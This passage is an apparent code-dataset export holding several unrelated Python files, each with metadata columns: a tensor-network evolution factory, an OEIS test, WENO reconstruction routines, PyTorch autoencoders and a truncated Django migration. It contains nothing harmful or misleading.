    :param tau: Timestep for each invocation of evolve. Real timestep should be passed here. Default is .01
    :param state_compression_kwargs: Arguments for mpa compression after each dot product (see real time
                                     evolution factory function for details)
    :param op_compression_kwargs: Arguments for trotter step operator pre-compression (see real time evolution
                                  factory function for details)
    :param second_order_trotter: Switch to use second order instead of fourth order trotter if desired
                                 By default fourth order Trotter is used
    :param t0: Initial time of the propagation
    :param psi_0_compression_kwargs: Optional compresion kwargs for the initial state (see real time evolution
                                     factory function for details)
    :param track_trace: If the trace of the (effective) density matrix should be tracked during the
                        imaginary time evolution
    :return: TMP object. If mpa_type is mps: ITMPS obj., if mpa_type is mpo: ITMPO obj.,
             if mpa_type is pmps: ITPMPS obj.
    :raises AssertionError: If the state shape does not match mpa_type, if tau is not a nonzero
                            real number, or if mpa_type is unrecognized.
    """
    if not check_shape(psi_0, mpa_type):
        raise AssertionError('MPA shape of the initial state is not compatible with the chosen mpa_type')
    # Explicit check instead of a bare `assert`: input validation must survive `python -O`.
    # Same exception type (AssertionError) as before, so callers are unaffected.
    if not (np.imag(tau) == 0 and np.real(tau) != 0):
        raise AssertionError('tau must be a nonzero real number')
    # Wick rotation: the propagators receive the imaginary timestep 1j*tau.
    tau = 1j * tau
    # One propagator class per mpa_type. The two booleans are the positional
    # flags the original branches passed (presumably ancilla/operator switches
    # of the TMP base class — confirm against the propagator implementations).
    factories = {'mps': (ITMPS, False, False),
                 'pmps': (ITPMPS, True, False),
                 'mpo': (ITMPO, False, True)}
    if mpa_type not in factories:
        raise AssertionError('Unrecognized mpa_type')
    propagator, flag_a, flag_b = factories[mpa_type]
    return propagator.from_hi(psi_0, flag_a, flag_b, hi, tau=tau,
                              state_compression_kwargs=state_compression_kwargs,
                              op_compression_kwargs=op_compression_kwargs,
                              second_order_trotter=second_order_trotter, t0=t0,
                              psi_0_compression_kwargs=psi_0_compression_kwargs,
                              track_trace=track_trace)
| 66.526786
| 113
| 0.64139
| 934
| 7,451
| 4.885439
| 0.149893
| 0.17883
| 0.077142
| 0.073636
| 0.911681
| 0.885382
| 0.885382
| 0.885382
| 0.885382
| 0.885382
| 0
| 0.011995
| 0.306268
| 7,451
| 111
| 114
| 67.126126
| 0.870768
| 0.42558
| 0
| 0.790323
| 0
| 0
| 0.050906
| 0
| 0
| 0
| 0
| 0
| 0.096774
| 1
| 0.032258
| false
| 0
| 0.080645
| 0
| 0.209677
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
add61b93da4fc9f378051c2a96440624942583ea
| 94
|
py
|
Python
|
tests/test_A000290.py
|
TimothyDJones/oeis
|
d9d608bc32ee31c73c139e1b68e4eb6315205e8d
|
[
"MIT"
] | 21
|
2020-03-21T17:50:13.000Z
|
2022-01-18T01:52:47.000Z
|
tests/test_A000290.py
|
TimothyDJones/oeis
|
d9d608bc32ee31c73c139e1b68e4eb6315205e8d
|
[
"MIT"
] | 296
|
2019-11-18T14:04:36.000Z
|
2022-03-27T21:59:24.000Z
|
tests/test_A000290.py
|
TimothyDJones/oeis
|
d9d608bc32ee31c73c139e1b68e4eb6315205e8d
|
[
"MIT"
] | 29
|
2019-11-18T11:56:22.000Z
|
2022-03-26T22:31:57.000Z
|
from oeis import A000290
def test_squares():
    # A000290 is the sequence of perfect squares; compare its prefix
    # against squares computed directly.
    expected = [n * n for n in range(6)]
    assert A000290[:6] == expected
| 15.666667
| 46
| 0.617021
| 16
| 94
| 3.5625
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.287671
| 0.223404
| 94
| 5
| 47
| 18.8
| 0.493151
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
adf1125aa39956e6f42a70f2a96f782cf039240f
| 14,658
|
py
|
Python
|
HydroWeno/Weno.py
|
Goobley/WenoExperiments
|
de3207d35ea12a8be60241cdb958ed01db7a52eb
|
[
"MIT"
] | null | null | null |
HydroWeno/Weno.py
|
Goobley/WenoExperiments
|
de3207d35ea12a8be60241cdb958ed01db7a52eb
|
[
"MIT"
] | null | null | null |
HydroWeno/Weno.py
|
Goobley/WenoExperiments
|
de3207d35ea12a8be60241cdb958ed01db7a52eb
|
[
"MIT"
] | 1
|
2020-08-10T07:19:45.000Z
|
2020-08-10T07:19:45.000Z
|
import numpy as np
from numba import njit, stencil, prange
@njit(parallel=True, cache=True)
def reconstruct_weno(q, dx=None):
    """Classic fifth-order WENO (Jiang-Shu weights) interface reconstruction.

    :param q: 2D array of shape (nRows, nGrid); each row is reconstructed
        independently (rows are parallelised with prange).
    :param dx: unused here; accepted so all reconstructors share one signature.
    :return: array of shape (nRows, 2, nGrid). Index 0 along axis 1 uses the
        'L' coefficient/weight set, index 1 the 'R' set — presumably the
        left/right-biased interface states; confirm against callers.
    """
    nRows, nGrid = q.shape
    result = np.zeros((nRows, 2, nGrid))
    # Set up general and left/right coefficients.
    # The left/right coeffs are just flipped relative to each other
    Pow = 2        # exponent applied to the smoothness indicators below
    WenoEps = 1e-6  # guards against division by zero for flat stencils
    EnoCoeffL = np.array((( 11.0/6.0, -7.0/6.0, 2.0/6.0),
                          ( 2.0/6.0, 5.0/6.0, -1.0/6.0),
                          (-1.0/6.0, 5.0/6.0, 2.0/6.0)))
    LinWL = np.array([0.3, 0.6, 0.1])
    EnoCoeffR = np.array((( 2.0/6.0, -7.0/6.0, 11.0/6.0),
                          (-1.0/6.0, 5.0/6.0, 2.0/6.0),
                          ( 2.0/6.0, 5.0/6.0, -1.0/6.0)))
    LinWR = np.array([0.1, 0.6, 0.3])
    # Loop over each row in the q matrix - we parallelise over rows
    for row in prange(nRows):
        beta = np.empty(3)
        # Interior cells only; each cell needs a 5-point stencil (i-2 .. i+2).
        for i in range(2, nGrid-2):
            # Compute beta, the smoothness indicator for each intepolating polynomial
            beta[0] = 13./12.*(q[row, i-2] - 2.*q[row, i-1] + q[row, i])**2 + 0.25*(q[row, i-2] - 4.*q[row, i-1] + 3.*q[row, i])**2
            beta[1] = 13./12.*(q[row, i-1] - 2.*q[row, i] + q[row, i+1])**2 + 0.25*(q[row, i-1] - q[row, i+1])**2
            beta[2] = 13./12.*(q[row, i] - 2.*q[row, i+1] + q[row, i+2])**2 + 0.25*(3.*q[row, i] - 4.*q[row, i+1] + q[row, i+2])**2
            # Compute and normalise the non-linear weights
            nonLinWL = LinWL / (WenoEps + beta)**Pow
            nonLinWR = LinWR / (WenoEps + beta)**Pow
            nonLinWL /= np.sum(nonLinWL)
            nonLinWR /= np.sum(nonLinWR)
            # Compute the standard polynomial reconstructions
            enoIntpL = np.zeros(3)
            enoIntpR = np.zeros(3)
            for s in range(3):
                gridIdx = s + i - 2
                enoIntpL[s] = np.dot(q[row, gridIdx:gridIdx+3], EnoCoeffL[2-s])
                enoIntpR[s] = np.dot(q[row, gridIdx:gridIdx+3], EnoCoeffR[s])
            # Combine the different polynomial reconstrucitions weighted by their non-linear weights
            result[row, 0, i] = np.dot(nonLinWL, enoIntpL)
            result[row, 1, i] = np.dot(nonLinWR, enoIntpR)
    # The two cells at each boundary have no full stencil: copy the cell
    # averages through unreconstructed.
    result[:, 0, :2] = q[:, :2]
    result[:, 1, :2] = q[:, :2]
    result[:, 0, -2:] = q[:, -2:]
    result[:, 1, -2:] = q[:, -2:]
    return result
@njit(parallel=True, cache=True)
def reconstruct_weno_log(q, dx=None):
    """Fifth-order WENO reconstruction performed in log-space for selected rows.

    Rows 0, 2 and 3 (presumably positive quantities such as density/pressure —
    confirm against callers) are log-transformed before the standard WENO5
    reconstruction and exponentiated afterwards, keeping those rows positive.

    :param q: 2D array of shape (nRows, nGrid); NOT modified (a copy is taken).
    :param dx: unused here; accepted so all reconstructors share one signature.
    :return: array of shape (nRows, 2, nGrid). Index 0 along axis 1 uses the
        'L' coefficient/weight set, index 1 the 'R' set.
    """
    # BUG FIX: the previous version took the log of rows 0, 2 and 3 of the
    # caller's array in place and never undid it, silently corrupting the
    # caller's state after every call. Work on a private copy instead; the
    # returned reconstruction is unchanged.
    q = q.copy()
    nRows, nGrid = q.shape
    result = np.zeros((nRows, 2, nGrid))
    # Set up general and left/right coefficients.
    # The left/right coeffs are just flipped relative to each other
    Pow = 2
    WenoEps = 1e-6
    EnoCoeffL = np.array((( 11.0/6.0, -7.0/6.0, 2.0/6.0),
                          ( 2.0/6.0, 5.0/6.0, -1.0/6.0),
                          (-1.0/6.0, 5.0/6.0, 2.0/6.0)))
    LinWL = np.array([0.3, 0.6, 0.1])
    EnoCoeffR = np.array((( 2.0/6.0, -7.0/6.0, 11.0/6.0),
                          (-1.0/6.0, 5.0/6.0, 2.0/6.0),
                          ( 2.0/6.0, 5.0/6.0, -1.0/6.0)))
    LinWR = np.array([0.1, 0.6, 0.3])
    # Transform the selected rows (of the copy) into log-space.
    q[0] = np.log(q[0])
    q[2] = np.log(q[2])
    q[3] = np.log(q[3])
    # Loop over each row in the q matrix - we parallelise over rows
    for row in prange(nRows):
        beta = np.empty(3)
        for i in range(2, nGrid-2):
            # Compute beta, the smoothness indicator for each intepolating polynomial
            beta[0] = 13./12.*(q[row, i-2] - 2.*q[row, i-1] + q[row, i])**2 + 0.25*(q[row, i-2] - 4.*q[row, i-1] + 3.*q[row, i])**2
            beta[1] = 13./12.*(q[row, i-1] - 2.*q[row, i] + q[row, i+1])**2 + 0.25*(q[row, i-1] - q[row, i+1])**2
            beta[2] = 13./12.*(q[row, i] - 2.*q[row, i+1] + q[row, i+2])**2 + 0.25*(3.*q[row, i] - 4.*q[row, i+1] + q[row, i+2])**2
            # Compute and normalise the non-linear weights
            nonLinWL = LinWL / (WenoEps + beta)**Pow
            nonLinWR = LinWR / (WenoEps + beta)**Pow
            nonLinWL /= np.sum(nonLinWL)
            nonLinWR /= np.sum(nonLinWR)
            # Compute the standard polynomial reconstructions
            enoIntpL = np.zeros(3)
            enoIntpR = np.zeros(3)
            for s in range(3):
                gridIdx = s + i - 2
                enoIntpL[s] = np.dot(q[row, gridIdx:gridIdx+3], EnoCoeffL[2-s])
                enoIntpR[s] = np.dot(q[row, gridIdx:gridIdx+3], EnoCoeffR[s])
            # Combine the different polynomial reconstrucitions weighted by their non-linear weights
            result[row, 0, i] = np.dot(nonLinWL, enoIntpL)
            result[row, 1, i] = np.dot(nonLinWR, enoIntpR)
    # Boundary cells lack a full stencil: copy the (log-space) averages through.
    result[:, 0, :2] = q[:, :2]
    result[:, 1, :2] = q[:, :2]
    result[:, 0, -2:] = q[:, -2:]
    result[:, 1, -2:] = q[:, -2:]
    # Map the log-space rows back to physical values.
    result[0] = np.exp(result[0])
    result[2] = np.exp(result[2])
    result[3] = np.exp(result[3])
    return result
@njit(parallel=True, cache=True)
def reconstruct_weno_z(q, dx=None):
    """WENO-Z variant of the fifth-order WENO interface reconstruction.

    Uses the Borges et al. tau5 indicator (|beta0 - beta2|) to form the
    non-linear weights, which is less dissipative near smooth extrema than
    the classic Jiang-Shu weights used by reconstruct_weno.

    :param q: 2D array of shape (nRows, nGrid); each row is reconstructed
        independently (rows are parallelised with prange).
    :param dx: unused here; accepted so all reconstructors share one signature.
    :return: array of shape (nRows, 2, nGrid). Index 0 along axis 1 uses the
        'L' coefficient/weight set, index 1 the 'R' set.
    """
    nRows, nGrid = q.shape
    result = np.zeros((nRows, 2, nGrid))
    # Set up general and left/right coefficients.
    # The left/right coeffs are just flipped relative to each other
    # (the classic `Pow` exponent is not used on the WENO-Z weight path,
    # so the unused constant has been removed.)
    WenoEps = 1e-10
    EnoCoeffL = np.array((( 11.0/6.0, -7.0/6.0, 2.0/6.0),
                          ( 2.0/6.0, 5.0/6.0, -1.0/6.0),
                          (-1.0/6.0, 5.0/6.0, 2.0/6.0)))
    LinWL = np.array([0.3, 0.6, 0.1])
    EnoCoeffR = np.array((( 2.0/6.0, -7.0/6.0, 11.0/6.0),
                          (-1.0/6.0, 5.0/6.0, 2.0/6.0),
                          ( 2.0/6.0, 5.0/6.0, -1.0/6.0)))
    LinWR = np.array([0.1, 0.6, 0.3])
    # Loop over each row in the q matrix - we parallelise over rows
    for row in prange(nRows):
        beta = np.empty(3)
        betaZ = np.empty(3)
        for i in range(2, nGrid-2):
            # Compute beta, the smoothness indicator for each intepolating polynomial
            beta[0] = 13./12.*(q[row, i-2] - 2.*q[row, i-1] + q[row, i])**2 + 0.25*(q[row, i-2] - 4.*q[row, i-1] + 3.*q[row, i])**2
            beta[1] = 13./12.*(q[row, i-1] - 2.*q[row, i] + q[row, i+1])**2 + 0.25*(q[row, i-1] - q[row, i+1])**2
            beta[2] = 13./12.*(q[row, i] - 2.*q[row, i+1] + q[row, i+2])**2 + 0.25*(3.*q[row, i] - 4.*q[row, i+1] + q[row, i+2])**2
            # WENO-Z global smoothness indicator and modified betas.
            tau5 = np.abs(beta[0] - beta[2])
            betaZ[:] = ((beta + WenoEps) / (beta + tau5 + WenoEps))
            # Compute and normalise the non-linear weights
            nonLinWL = LinWL / betaZ
            nonLinWR = LinWR / betaZ
            nonLinWL /= np.sum(nonLinWL)
            nonLinWR /= np.sum(nonLinWR)
            # Compute the standard polynomial reconstructions
            enoIntpL = np.zeros(3)
            enoIntpR = np.zeros(3)
            for s in range(3):
                gridIdx = s + i - 2
                enoIntpL[s] = np.dot(q[row, gridIdx:gridIdx+3], EnoCoeffL[2-s])
                enoIntpR[s] = np.dot(q[row, gridIdx:gridIdx+3], EnoCoeffR[s])
            # Combine the different polynomial reconstrucitions weighted by their non-linear weights
            result[row, 0, i] = np.dot(nonLinWL, enoIntpL)
            result[row, 1, i] = np.dot(nonLinWR, enoIntpR)
    # Boundary cells lack a full stencil: copy the cell averages through.
    result[:, 0, :2] = q[:, :2]
    result[:, 1, :2] = q[:, :2]
    result[:, 0, -2:] = q[:, -2:]
    result[:, 1, -2:] = q[:, -2:]
    return result
@njit(parallel=True, cache=True)
def reconstruct_weno_nm(q, dx):
    """Fifth-order WENO reconstruction on a non-uniform mesh (NM variant).

    Parameters
    ----------
    q : float array, shape (nRows, nGrid)
        Cell values; rows are reconstructed independently (in parallel).
    dx : float array, shape (nGrid,)
        Cell widths, used to form the length ratios rho below.

    Returns
    -------
    float array, shape (nRows, 2, nGrid)
        result[:, 0, :] is the left-biased and result[:, 1, :] the
        right-biased reconstruction; the two outermost cells on each side
        are copied through from q unmodified (first-order fallback).
    """
    nRows, nGrid = q.shape
    result = np.zeros((nRows, 2, nGrid))
    # Set up general coefficients.
    Pow = 2  # exponent applied to the smoothness indicators in the weights
    WenoEps = 1e-34  # guards against division by zero for perfectly smooth data
    EnoCoeff = np.array((( 2.0, -1.0/3.0, -2.0/3.0),
                         (-1.0/3.0, 2.0/3.0, 2.0/3.0),
                         ( 2.0/3.0, 2.0/3.0, -1.0/3.0)))
    # Each smoothness indicator below is
    # 13/12*dot(Part1, stencil)**2 + 1/4*dot(Part2, stencil)**2.
    BetaCoeffPart1 = np.array(((0.0, 2.0, -2.0),
                               (2.0, -4.0, 2.0),
                               (2.0, -4.0, 2.0)))
    BetaCoeffPart2 = np.array((( 4.0, -2.0, -2.0),
                               (-2.0, 0.0, 2.0),
                               (-6.0, 8.0, -2.0)))
    LinW = np.array([0.1, 0.6, 0.3])
    # length ratio designated rho: rho[i] = dx[i] / (dx[i] + dx[i+1])
    rho = np.zeros(nGrid)
    rho[:-1] = dx[:-1] / (dx[:-1] + dx[1:])
    # Loop over each row in the q matrix - we parallelise over rows.
    for row in prange(nRows):
        betaL = np.empty(3)
        betaR = np.empty(3)
        stencilL = np.empty((3, 3))  # coords are [stencilIdx, stencilEntry]
        stencilR = np.empty((3, 3))  # coords are [stencilIdx, stencilEntry]
        enoIntpL = np.empty(3)
        enoIntpR = np.empty(3)
        for i in range(2, nGrid-2):
            # Interface values blending neighbouring cells with the local
            # length ratios of the non-uniform mesh.
            q00 = q[row, i-1] + rho[i-1] * (q[row, i-1] - q[row, i-2])
            q01 = (1.0 - rho[i]) * q[row, i] + rho[i] * q[row, i+1]
            q10 = (1.0 - rho[i-1]) * q[row, i-1] + rho[i-1] * q[row, i]
            q11 = q[row, i+1] + rho[i+1] * (q[row, i+1] - q[row, i+2])
            q12 = (1.0 - rho[i+1]) * q[row, i+1] + rho[i+1] * q[row, i+2]
            q21 = (1.0 - rho[i-2]) * q[row, i-2] + rho[i-2] * q[row, i-1]
            # Assemble the three candidate stencils for each side.
            stencilL[0, 0] = q[row, i]
            stencilL[0, 1] = q01
            stencilL[0, 2] = q11
            stencilL[1, 0] = q01
            stencilL[1, 1] = q[row, i]
            stencilL[1, 2] = q10
            stencilL[2, 0] = q10
            stencilL[2, 1] = q[row, i-1]
            stencilL[2, 2] = q21
            stencilR[0, 0] = q[row, i]
            stencilR[0, 1] = q10
            stencilR[0, 2] = q00
            stencilR[1, 0] = q10
            stencilR[1, 1] = q[row, i]
            stencilR[1, 2] = q01
            stencilR[2, 0] = q01
            stencilR[2, 1] = q[row, i+1]
            stencilR[2, 2] = q12
            # Compute beta, the smoothness indicator for each interpolating polynomial.
            for s in range(3):
                betaL[s] = 13.0/12.0*np.dot(BetaCoeffPart1[s], stencilL[s])**2 + 0.25*np.dot(BetaCoeffPart2[s], stencilL[s])**2
                betaR[s] = 13.0/12.0*np.dot(BetaCoeffPart1[s], stencilR[s])**2 + 0.25*np.dot(BetaCoeffPart2[s], stencilR[s])**2
            # Compute and normalise the non-linear weights.
            nonLinWL = LinW / (WenoEps + betaL)**Pow
            nonLinWR = LinW / (WenoEps + betaR)**Pow
            nonLinWL /= np.sum(nonLinWL)
            nonLinWR /= np.sum(nonLinWR)
            # Compute the standard polynomial reconstructions.
            for s in range(3):
                enoIntpL[s] = np.dot(stencilL[s], EnoCoeff[s])
                enoIntpR[s] = np.dot(stencilR[s], EnoCoeff[s])
            # Combine the polynomial reconstructions weighted by their non-linear weights.
            result[row, 0, i] = np.dot(nonLinWL, enoIntpL)
            result[row, 1, i] = np.dot(nonLinWR, enoIntpR)
    # First-order fallback in the boundary cells where the stencil does not fit.
    result[:, 0, :2] = q[:, :2]
    result[:, 1, :2] = q[:, :2]
    result[:, 0, -2:] = q[:, -2:]
    result[:, 1, -2:] = q[:, -2:]
    return result
@njit(parallel=True, cache=True)
def reconstruct_weno_nm_z(q, dx):
    """Fifth-order WENO-Z reconstruction on a non-uniform mesh.

    Identical stencil construction to the plain non-uniform-mesh variant,
    but the non-linear weights use the WENO-Z ratio formed from the global
    indicator tau5 = |beta[0] - beta[2]| instead of the inverse-power form.

    Parameters
    ----------
    q : float array, shape (nRows, nGrid)
        Cell values; rows are reconstructed independently (in parallel).
    dx : float array, shape (nGrid,)
        Cell widths, used to form the length ratios rho below.

    Returns
    -------
    float array, shape (nRows, 2, nGrid)
        result[:, 0, :] is the left-biased and result[:, 1, :] the
        right-biased reconstruction; the two outermost cells on each side
        are copied through from q unmodified (first-order fallback).
    """
    nRows, nGrid = q.shape
    result = np.zeros((nRows, 2, nGrid))
    # Set up general coefficients.
    # NOTE: the classic-WENO exponent (Pow) is not needed here - the
    # Z-weights below are formed directly from the betaZ ratios.
    WenoEps = 1e-34  # guards against division by zero for perfectly smooth data
    EnoCoeff = np.array((( 2.0, -1.0/3.0, -2.0/3.0),
                         (-1.0/3.0, 2.0/3.0, 2.0/3.0),
                         ( 2.0/3.0, 2.0/3.0, -1.0/3.0)))
    # Each smoothness indicator below is
    # 13/12*dot(Part1, stencil)**2 + 1/4*dot(Part2, stencil)**2.
    BetaCoeffPart1 = np.array(((0.0, 2.0, -2.0),
                               (2.0, -4.0, 2.0),
                               (2.0, -4.0, 2.0)))
    BetaCoeffPart2 = np.array((( 4.0, -2.0, -2.0),
                               (-2.0, 0.0, 2.0),
                               (-6.0, 8.0, -2.0)))
    LinW = np.array([0.1, 0.6, 0.3])
    # length ratio designated rho: rho[i] = dx[i] / (dx[i] + dx[i+1])
    rho = np.zeros(nGrid)
    rho[:-1] = dx[:-1] / (dx[:-1] + dx[1:])
    # Loop over each row in the q matrix - we parallelise over rows.
    for row in prange(nRows):
        betaL = np.empty(3)
        betaR = np.empty(3)
        betaZL = np.empty(3)
        betaZR = np.empty(3)
        stencilL = np.empty((3, 3))  # coords are [stencilIdx, stencilEntry]
        stencilR = np.empty((3, 3))  # coords are [stencilIdx, stencilEntry]
        enoIntpL = np.empty(3)
        enoIntpR = np.empty(3)
        for i in range(2, nGrid-2):
            # Interface values blending neighbouring cells with the local
            # length ratios of the non-uniform mesh.
            q00 = q[row, i-1] + rho[i-1] * (q[row, i-1] - q[row, i-2])
            q01 = (1.0 - rho[i]) * q[row, i] + rho[i] * q[row, i+1]
            q10 = (1.0 - rho[i-1]) * q[row, i-1] + rho[i-1] * q[row, i]
            q11 = q[row, i+1] + rho[i+1] * (q[row, i+1] - q[row, i+2])
            q12 = (1.0 - rho[i+1]) * q[row, i+1] + rho[i+1] * q[row, i+2]
            q21 = (1.0 - rho[i-2]) * q[row, i-2] + rho[i-2] * q[row, i-1]
            # Assemble the three candidate stencils for each side.
            stencilL[0, 0] = q[row, i]
            stencilL[0, 1] = q01
            stencilL[0, 2] = q11
            stencilL[1, 0] = q01
            stencilL[1, 1] = q[row, i]
            stencilL[1, 2] = q10
            stencilL[2, 0] = q10
            stencilL[2, 1] = q[row, i-1]
            stencilL[2, 2] = q21
            stencilR[0, 0] = q[row, i]
            stencilR[0, 1] = q10
            stencilR[0, 2] = q00
            stencilR[1, 0] = q10
            stencilR[1, 1] = q[row, i]
            stencilR[1, 2] = q01
            stencilR[2, 0] = q01
            stencilR[2, 1] = q[row, i+1]
            stencilR[2, 2] = q12
            # Compute beta, the smoothness indicator for each interpolating polynomial.
            for s in range(3):
                betaL[s] = 13.0/12.0*np.dot(BetaCoeffPart1[s], stencilL[s])**2 + 0.25*np.dot(BetaCoeffPart2[s], stencilL[s])**2
                betaR[s] = 13.0/12.0*np.dot(BetaCoeffPart1[s], stencilR[s])**2 + 0.25*np.dot(BetaCoeffPart2[s], stencilR[s])**2
            # tau5: the global (5-cell) smoothness measure of the WENO-Z scheme.
            tau5L = np.abs(betaL[0] - betaL[2])
            tau5R = np.abs(betaR[0] - betaR[2])
            betaZL[:] = ((betaL + WenoEps) / (betaL + tau5L + WenoEps))
            betaZR[:] = ((betaR + WenoEps) / (betaR + tau5R + WenoEps))
            # Compute and normalise the non-linear weights.
            nonLinWL = LinW / betaZL
            nonLinWR = LinW / betaZR
            nonLinWL /= np.sum(nonLinWL)
            nonLinWR /= np.sum(nonLinWR)
            # Compute the standard polynomial reconstructions.
            for s in range(3):
                enoIntpL[s] = np.dot(stencilL[s], EnoCoeff[s])
                enoIntpR[s] = np.dot(stencilR[s], EnoCoeff[s])
            # Combine the polynomial reconstructions weighted by their non-linear weights.
            result[row, 0, i] = np.dot(nonLinWL, enoIntpL)
            result[row, 1, i] = np.dot(nonLinWR, enoIntpR)
    # First-order fallback in the boundary cells where the stencil does not fit.
    result[:, 0, :2] = q[:, :2]
    result[:, 1, :2] = q[:, :2]
    result[:, 0, -2:] = q[:, -2:]
    result[:, 1, -2:] = q[:, -2:]
    return result
| 43.111765
| 131
| 0.479602
| 2,326
| 14,658
| 3.018057
| 0.05718
| 0.055271
| 0.064815
| 0.037607
| 0.944302
| 0.944302
| 0.944302
| 0.944302
| 0.938177
| 0.914672
| 0
| 0.102346
| 0.334084
| 14,658
| 340
| 132
| 43.111765
| 0.616843
| 0.146882
| 0
| 0.889313
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019084
| false
| 0
| 0.007634
| 0
| 0.045802
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc0fa790fcb8ab1bd6577826c4e3b0e56c01341f
| 1,646
|
py
|
Python
|
DIGDriver/region_model/autoencoders/ae_nets/fc_nets.py
|
maxwellsh/DIGDriver
|
1f8503c8c22861d6f9b601fd8c5a131e3dc31fc1
|
[
"BSD-3-Clause"
] | 1
|
2021-08-07T00:05:48.000Z
|
2021-08-07T00:05:48.000Z
|
DIGDriver/region_model/autoencoders/ae_nets/fc_nets.py
|
maxwellsh/DIGDriver
|
1f8503c8c22861d6f9b601fd8c5a131e3dc31fc1
|
[
"BSD-3-Clause"
] | null | null | null |
DIGDriver/region_model/autoencoders/ae_nets/fc_nets.py
|
maxwellsh/DIGDriver
|
1f8503c8c22861d6f9b601fd8c5a131e3dc31fc1
|
[
"BSD-3-Clause"
] | null | null | null |
import torch
import torch.nn as nn
class Autoencoder_FC(nn.Module):
    """Fully-connected autoencoder over flattened (window x tracks) input.

    Compresses an input of size w * tracks down to a 16-dimensional latent
    code through 512 -> 128 -> 32 -> 16 ReLU layers and mirrors the same
    stack to reconstruct the input.
    """

    def __init__(self, in_shape):
        """in_shape: (batch_size, w, tracks); only w * tracks is used,
        so the batch-size entry is ignored."""
        super().__init__()
        _, w, tracks = in_shape
        self.encoder = nn.Sequential(
            nn.Linear(w * tracks, 512),
            nn.ReLU(),
            nn.Linear(512, 128),
            nn.ReLU(),
            nn.Linear(128, 32),
            nn.ReLU(),
            nn.Linear(32, 16),
        )
        self.decoder = nn.Sequential(
            nn.Linear(16, 32),
            nn.ReLU(),
            nn.Linear(32, 128),
            nn.ReLU(),
            nn.Linear(128, 512),
            nn.ReLU(),
            nn.Linear(512, w * tracks),
        )

    def forward(self, x):
        """Encode then decode x; returns the reconstruction (same shape as x)."""
        return self.decoder(self.encoder(x))

    def embedding(self, x):
        """Return the 16-dimensional latent code for x."""
        return self.encoder(x)

    # Backward-compatible alias preserving the original (misspelled) API name.
    embeding = embedding
class Mean_Vec_Autoencoder_FC(nn.Module):
    """Fully-connected autoencoder over a per-window mean vector of size
    `tracks`, compressed to a 16-dimensional latent code through
    512 -> 128 -> 32 -> 16 ReLU layers and mirrored back up."""

    def __init__(self, in_shape):
        """in_shape: (batch_size, w, tracks); only `tracks` is used."""
        super().__init__()
        bs, w, tracks = in_shape
        dims = [tracks, 512, 128, 32, 16]
        # Build Linear+ReLU pairs, then drop the trailing ReLU so the
        # bottleneck (and the reconstruction) stay linear outputs.
        enc_layers = []
        for d_in, d_out in zip(dims[:-1], dims[1:]):
            enc_layers.append(nn.Linear(d_in, d_out))
            enc_layers.append(nn.ReLU())
        self.encoder = nn.Sequential(*enc_layers[:-1])
        dec_dims = dims[::-1]
        dec_layers = []
        for d_in, d_out in zip(dec_dims[:-1], dec_dims[1:]):
            dec_layers.append(nn.Linear(d_in, d_out))
            dec_layers.append(nn.ReLU())
        self.decoder = nn.Sequential(*dec_layers[:-1])

    def forward(self, x):
        """Encode then decode x; returns the reconstruction."""
        return self.decoder(self.encoder(x))

    def embeding(self, x):
        """Return the 16-dimensional latent code for x."""
        return self.encoder(x)
| 24.567164
| 41
| 0.458688
| 197
| 1,646
| 3.71066
| 0.162437
| 0.175103
| 0.131327
| 0.229822
| 0.935705
| 0.935705
| 0.935705
| 0.935705
| 0.935705
| 0.935705
| 0
| 0.07362
| 0.405832
| 1,646
| 66
| 42
| 24.939394
| 0.673824
| 0
| 0
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.033333
| 0
| 0.233333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cb094fe8464af6f4ce8982e36f75fb024bd2d84b
| 2,490
|
py
|
Python
|
business_register/migrations/0075_auto_20210324_1008.py
|
OlexandrTopuzov/Data_converter
|
0ac2319ccaae790af35ab2202724c65d83d32ecc
|
[
"MIT"
] | null | null | null |
business_register/migrations/0075_auto_20210324_1008.py
|
OlexandrTopuzov/Data_converter
|
0ac2319ccaae790af35ab2202724c65d83d32ecc
|
[
"MIT"
] | null | null | null |
business_register/migrations/0075_auto_20210324_1008.py
|
OlexandrTopuzov/Data_converter
|
0ac2319ccaae790af35ab2202724c65d83d32ecc
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.7 on 2021-03-24 10:08
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: updates only field metadata (help_text /
    verbose_name) on several DateFields across PEP-related models; every
    operation is an AlterField on a nullable DateField."""

    dependencies = [
        ('business_register', '0074_auto_20210323_1515'),
    ]

    operations = [
        migrations.AlterField(
            model_name='companylinkwithpep',
            name='confirmation_date',
            field=models.DateField(help_text='Date of confirmation of connection in the "Anti-Corruption Action Center" database.', null=True, verbose_name='connection`s confirmation date'),
        ),
        migrations.AlterField(
            model_name='companylinkwithpep',
            name='end_date',
